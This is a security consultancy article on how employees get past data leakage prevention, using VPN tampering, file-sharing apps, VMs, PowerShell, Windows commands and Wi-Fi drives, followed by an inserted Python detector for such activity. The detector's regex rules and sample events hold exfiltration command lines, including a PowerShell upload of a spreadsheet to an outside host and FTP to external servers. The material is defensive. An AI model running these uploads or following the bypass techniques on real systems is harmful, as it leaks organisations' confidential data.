Data leakage is a serious threat to organizations, as it can lead to significant financial losses and compromised security. In recent times, companies have implemented data leakage prevention (DLP) measures to prevent both outsiders and insiders from gaining unauthorized access to data.
There are several reasons why DLP measures are focused on insiders as a risk. First, it can be difficult to detect and prevent data breaches when they are carried out by employees who have legitimate access to company systems and data. Second, insiders may have motivations for breaching security protocols, such as financial gain, dissatisfaction with their job, or personal grievances.
As companies are investing more resources in their data leakage prevention (DLP) measures, some tech-savvy employees have found ways to bypass these security protocols. By leveraging their technical knowledge and experience with software, these workers can evade the restrictive measures put in place by their employers. This creates a major challenge for cyber security teams, who must continuously adapt their strategies to stay ahead of the curve.
Those employees who are not tech-savvy are also relying on online video sites and social media to learn these tricks. Here are some techniques that employees are using to copy confidential data without getting detected:
- Tampering with the company VPN client: One way that employees can do this is through the use of virtual private networks (VPNs). VPNs allow users to create a secure, encrypted connection to another network. By tampering with the VPN configuration file, an employee can use the company-provided VPN client to connect to an unauthorized VPN server and access cloud storage sites.
- Using file-sharing applications: Another way that some employees are bypassing DLP measures is through the use of file-sharing applications. These platforms make it easy for users to share files and folders, even large ones with sensitive data, without putting them at risk. While these applications can be blocked by companies, tech-savvy employees know how to find ways around these restrictions as well. One such application is called IP Messenger.
- Using virtual machines: One way that some employees can steal or leak data from their company is through the use of virtual machines. Virtual machines are software programs that allow users to create an independent, temporary operating environment on their computer. By using a virtual machine, an employee can sneakily access sensitive data on their company’s network without being detected. In some cases, they may even be able to copy or download this data onto the virtual machine, putting it at risk of being leaked externally.
- PowerShell: PowerShell is a popular scripting language that can be used to automate various tasks. It can also be used to steal data, as it allows users to run commands on remote computers. This means that an attacker could use PowerShell to remotely access a company’s network and steal sensitive data. They could then exfiltrate this data off the network using a variety of methods, including uploading it to cloud storage services or sending it via email.
- Windows commands: Built-in Windows commands can be used by an attacker to steal data in several ways. For example, the “net use” command can be used to map a network drive, which allows an attacker to access data on a remote computer as if it were stored locally. Another is the “tasklist” command, which displays a list of all the running processes on a computer. By using this command, an attacker can see which processes are accessing sensitive data and then use that information to steal the data. Windows machines also have a built-in FTP client that can be used to upload confidential data to an external FTP server.
- Wi-Fi-enabled hard drives: Wi-Fi hard drives can be used by an employee to steal data in several ways. One way is by connecting the Wi-Fi hard drive to a computer and then accessing it via the browser. This allows an employee to upload sensitive data from the computer onto the Wi-Fi hard drive without creating a significant amount of logs when the browser is in incognito mode. The Wi-Fi name of the hard drive can also be renamed to an inconspicuous name. This technique also bypasses measures around USB device usage.
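Several items in the list above (PowerShell, “net use”, “tasklist”, the built-in FTP client) leave traces in process-creation logs. The following is an added example, not part of the original article: a small detection pass over constructed events, where the approved-host list, rule names, users and hosts are all assumptions made for illustration.

```python
import re
from collections import defaultdict

# Assumption: hosts approved for file shares and FTP in this environment.
APPROVED_HOSTS = {"fs01.corp.example"}
TRANSFER_RULES = {"net-use-unapproved-share", "ftp-unapproved-host", "powershell-file-upload"}

# (rule name, process image suffix, command-line pattern). A capture group,
# when present, holds the remote host that is checked against APPROVED_HOSTS.
RULES = [
    ("net-use-unapproved-share", "\\net.exe", re.compile(r"\buse\b.*?\\\\([^\\\s]+)\\", re.I)),
    ("ftp-unapproved-host", "\\ftp.exe", re.compile(r"^\S*ftp(?:\.exe)?(?:\s+(?:-\S+\s+)*(\w[\w.-]*))?", re.I)),
    ("powershell-file-upload", "\\powershell.exe", re.compile(
        r"Invoke-(?:WebRequest|RestMethod)\b.*-InFile\b|Send-MailMessage\b.*-Attachments\b", re.I)),
    ("process-enumeration", "\\tasklist.exe", re.compile(r"\btasklist\b", re.I)),
]

# Constructed process-creation events (user, image, command line), shaped like
# the fields in Windows Security event 4688 or Sysmon event 1.
SYS = "C:\\Windows\\System32\\"
SAMPLE_EVENTS = [
    ("alice", SYS + "net.exe", r"net use Z: \\fs01.corp.example\finance"),
    ("dave", SYS + "tasklist.exe", "tasklist /v"),
    ("bob", SYS + "tasklist.exe", "tasklist"),
    ("bob", SYS + "net.exe", r"net use Y: \\192.0.2.44\drop"),
    ("bob", SYS + "ftp.exe", "ftp files.example.net"),
    ("carol", SYS + "WindowsPowerShell\\v1.0\\powershell.exe",
     "powershell.exe -Command Invoke-RestMethod -Uri https://upload.example.net/u -Method Post -InFile q3.xlsx"),
]

def detect(events):
    """Return (user, rule, remote_host) for every event that matches a rule."""
    findings = []
    for user, image, cmd in events:
        for name, suffix, pattern in RULES:
            match = pattern.search(cmd) if image.lower().endswith(suffix) else None
            host = (match.group(1) or "").lower() or None if match and pattern.groups else None
            # Host-bearing rules are suppressed when the destination is approved.
            if match and not (pattern.groups and host in APPROVED_HOSTS):
                findings.append((user, name, host))
    return findings

def users_to_review(findings):
    """Group rules per user; process enumeration alone is context, not an alert."""
    per_user = defaultdict(set)
    for user, rule, _host in findings:
        per_user[user].add(rule)
    return {u: sorted(r) for u, r in per_user.items() if r & TRANSFER_RULES}

if __name__ == "__main__": print(users_to_review(detect(SAMPLE_EVENTS)))
```

A mapped drive to the approved file server produces no finding, and “tasklist” on its own is kept as context rather than raised as an alert, since administrators and help-desk staff run it routinely.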
As companies become increasingly dependent on technology, it is no surprise that tech-savvy employees are finding ways to bypass company data leakage prevention measures. To address this issue, companies need to focus on educating their employees about the importance of data security, as well as fine-tuning their DLP solutions so that they can detect and prevent sensitive data from being accessed or leaked by unauthorized users. In particular, companies should consider adopting solutions that take an integrated approach to data protection. This means that the solution not only detects and prevents data leakage but also provides visibility into which employees are accessing sensitive data and what they are doing with it. Only by taking a holistic approach to data security can companies hope to keep their sensitive data safe from the prying eyes of tech-savvy employees.
Reproduced with permission from The Times of India.
© Copyright 2022. The views expressed herein are those of the author(s) and not necessarily the views of Ankura Consulting Group, LLC., its management, its subsidiaries, its affiliates, or its other professionals. Ankura is not a law firm and cannot provide legal advice.